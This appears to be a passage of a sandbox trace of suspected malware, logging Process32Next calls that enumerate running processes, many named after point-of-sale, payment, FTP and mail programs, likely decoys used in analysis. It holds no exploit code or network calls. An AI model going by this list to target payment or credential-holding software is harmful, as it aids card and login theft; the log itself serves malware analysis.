lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="of-official.exe")) returned 1 [0192.308] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x484, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="billion.exe")) returned 1 [0192.309] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="newsignsister.exe")) returned 1 [0192.311] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="present-agree.exe")) returned 1 [0192.312] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0192.314] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="populationread.exe")) returned 1 [0192.316] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="play-religious.exe")) returned 1 [0192.317] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="look.exe")) returned 1 [0192.319] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="love.exe")) returned 1 [0192.320] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel final.exe")) returned 1 [0192.325] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0192.328] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0192.330] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0192.331] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0192.333] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0192.335] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0192.337] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1024, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0192.338] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0192.340] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0192.342] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0192.344] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0192.346] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x106c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0192.348] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0192.350] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0192.351] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0192.353] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0192.355] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0192.356] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0192.358] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0192.363] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0192.365] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0192.366] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0192.368] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0192.370] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0192.373] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0192.375] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0192.378] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0192.381] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0192.383] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0192.384] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0192.386] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0192.388] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0192.390] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0192.391] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0192.394] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0192.395] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0192.399] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0192.401] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0192.403] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0192.405] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0192.406] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1228, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0192.408] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0192.436] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0192.439] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0192.441] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0192.443] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0192.445] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0192.448] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0192.450] CloseHandle (hObject=0x2424) returned 1 [0192.450] Sleep (dwMilliseconds=0x64) [0192.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2424 [0192.476] Process32First (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0192.479] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x81, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0192.481] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0192.485] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.487] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0192.490] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0192.492] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0192.494] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0192.496] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0192.498] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.501] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.503] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0192.505] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.511] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.513] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.515] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.517] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.519] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.522] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.524] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0192.526] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0192.528] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0192.531] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2b, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0192.532] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0192.534] Process32Next (in: hSnapshot=0x2424, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, 